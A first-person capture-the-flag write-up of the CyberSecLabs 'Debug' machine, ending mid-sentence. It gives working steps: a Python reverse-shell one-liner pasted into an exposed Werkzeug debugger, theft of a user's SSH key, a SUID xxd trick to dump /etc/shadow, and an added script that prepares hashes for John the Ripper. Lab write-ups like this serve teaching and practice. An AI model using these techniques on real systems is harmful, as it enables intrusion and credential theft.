This is my sixth write-up, and I will be discussing my experience with the machine “Debug” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing or who want to boost their skills before taking on the OSCP. This machine was listed as a beginner-level box and was fairly easy in my opinion. An RCE in an exposed Werkzeug debugger console gives us a shell as the user megan. A SUID copy of xxd is then leveraged to read /etc/shadow, and the root hash is cracked with John the Ripper.
Step 1: Enumeration
I started off with two Nmap scans on this machine and stuck with the results from the first one. My first scan used the default scripts (-sC) and version detection (-sV). The second scan gave me the same results: only two ports were open on this machine, so I started with port 80.
I kicked off dirbuster to see what directories were available. I don't know about you, but if I see something with the word “console” in it, I am definitely going to start there.
Sure enough, this sucker was hosting a Werkzeug debugger console that let me throw Python commands at it. I smelled an RCE the minute I laid eyes on that console, so I tested it with a whoami command from Python. Sure enough, it spat back the user megan.
Now that I knew this thing was vulnerable, I set up a netcat listener on my machine, pasted a Python reverse shell into the Werkzeug debugger console, and caught the connection back on my machine. I had to trim the Python reverse shell I got from pentestmonkey by removing the python -c wrapper and its single quotes, since the console is already evaluating Python.
On my Kali machine:
nc -lvp 4444
In the Werkzeug debugger console I typed this (replace yourip with the address the listener is on):
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yourip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
There was a Metasploit module available for this exploit, but I wanted to figure it out the manual way for discipline. Not all exploits will have a Metasploit module, so you have to work with what you have.
In case you were lazy…
Metasploit module: Werkzeug Debug Shell Command Execution. Description: This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never…
The shell I got as megan was horrible (not a proper TTY), so I ran the following to upgrade it. First, inside the reverse shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Then hit Ctrl-Z to background it and, back in your own terminal, type the following (the fg brings the shell back to the foreground):
stty raw -echo; fg
Once the shell is back, set the terminal type inside it:
export TERM=xterm
Browsing around, I found that megan has a .ssh directory with her private key (id_rsa) readable. I grabbed the private key and moved it to my machine. This gave me persistence on the server, so I wouldn't have to keep rigging my shell. You can either send it back with netcat or just copy and paste the contents into a text file. I chose to be lazy and copied it into a text editor on my Kali machine.
Running ssh2john against it told me that this key was not password protected. I connected back to the target machine with the following commands from the directory where I had copied the key. SSH refuses to use a private key that is readable by other users, so I needed to tighten the file's permissions first:
sudo chmod 600 <your key file name here>
sudo ssh -i <your key file name here> megan@<target ip>
Back on the target server, I pushed over the LinEnum script to gather any information that might lead to a privilege escalation, serving it from my Kali box with Python's built-in HTTP server. You need to run the server from the directory that contains the file you want to serve.
On my Kali box I ran (the module is Python 2 only; on Python 3 the equivalent is python3 -m http.server 80):
python -m SimpleHTTPServer 80
On the target box, I grabbed the file from that server (wget or curl against my Kali box's address will do).
Now that the file was on the target machine, I needed to make it executable and then run it:
chmod +x LinEnum.sh
./LinEnum.sh
Scrolling through the script's results, an interesting SUID binary caught my eye: xxd (an ls -l on the binary shows the s in its permission bits). Some googling for “xxd exploit” turned up a way to read the shadow file with it. Because the binary is SUID root, xxd opens /etc/shadow with root's privileges and hex-dumps it; piping that into a second xxd -r reverses the dump back into the original text, so the whole file, hashes included, lands on your terminal:
xxd "/etc/shadow" | xxd -r
I focused on the root user's password hash and copied it into a text file back on my machine. I ran John the Ripper in its default mode (which includes its built-in wordlist) against the hash and recovered the root password.
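The copy-and-paste step above is easy to get wrong when a shadow file has dozens of accounts, most of them locked. Here is an added example, not code from the original write-up, that parses the text xxd -r gives back, drops the entries that are not hashes at all (empty, *, ! and !!), names the crypt format so john can be pointed at it, and emits user:hash lines in the form john accepts. SAMPLE_SHADOW is constructed and FAKE_ROOT_HASH is a SHA-512-crypt-shaped string, not the hash from the box.

```python
"""Pick the crackable hashes out of /etc/shadow and write them in a form John accepts.

Added example, not part of the original write-up. The sample below is constructed:
the root entry has the right shape for SHA-512-crypt but is made up.
"""
from typing import Dict, List

FAKE_ROOT_HASH = "$6$saltsalt$" + "Ab3" * 28 + "Zz"   # 86-char hash body: right shape, not real
SAMPLE_SHADOW = f"""root:{FAKE_ROOT_HASH}:18350:0:99999:7:::
daemon:*:18303:0:99999:7:::
megan:!:18350:0:99999:7:::
sshd:*:18303:0:99999:7:::
"""

# crypt(3) prefixes mapped to the --format names John the Ripper (jumbo) uses for them
HASH_FORMATS = {
    "$1$": "md5crypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
}


def parse_shadow(text: str) -> Dict[str, str]:
    """Map each user to the second field of its line (the hash field); skips malformed lines."""
    entries: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 2 or not parts[0]:
            continue
        entries[parts[0]] = parts[1]
    return entries


def is_crackable(hash_field: str) -> bool:
    """Empty, '*', '!' and '!!' (or any '!'-prefixed value) mean a locked or passwordless
    account, not a hash, so there is nothing for john to crack."""
    return bool(hash_field) and hash_field[0] not in "*!"


def hash_format(hash_field: str) -> str:
    """Name the john --format for a hash field, or 'unknown' for anything not in the table."""
    for prefix, fmt in HASH_FORMATS.items():
        if hash_field.startswith(prefix):
            return fmt
    return "unknown"


def crackable_entries(text: str) -> Dict[str, str]:
    """Only the accounts whose hash field actually holds a hash."""
    return {user: h for user, h in parse_shadow(text).items() if is_crackable(h)}


def john_lines(text: str) -> List[str]:
    """user:hash lines, the passwd-style input john reads directly."""
    return [f"{user}:{h}" for user, h in crackable_entries(text).items()]


def john_command(text: str, path: str = "hashes.txt") -> str:
    """Suggest a john invocation; the format is read off the first crackable hash."""
    hashes = list(crackable_entries(text).values())
    fmt = hash_format(hashes[0]) if hashes else "unknown"
    return f"john --format={fmt} {path}"


if __name__ == "__main__":
    # Feed the output of `xxd "/etc/shadow" | xxd -r` in via stdin, e.g. pasted from the target.
    import sys
    shadow_text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SHADOW
    with open("hashes.txt", "w") as f:
        f.write("\n".join(john_lines(shadow_text)) + "\n")
    print(john_command(shadow_text))
```

Running john without --format also works, as the write-up does, because john auto-detects the $6$ prefix; naming the format just avoids the ambiguity warning and keeps a mixed file from being cracked as the wrong type. Use john --show hashes.txt afterwards to print the recovered password next to its user.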
Now that I knew the password, I went back to the target machine and logged in as root with the discovered password using the following command: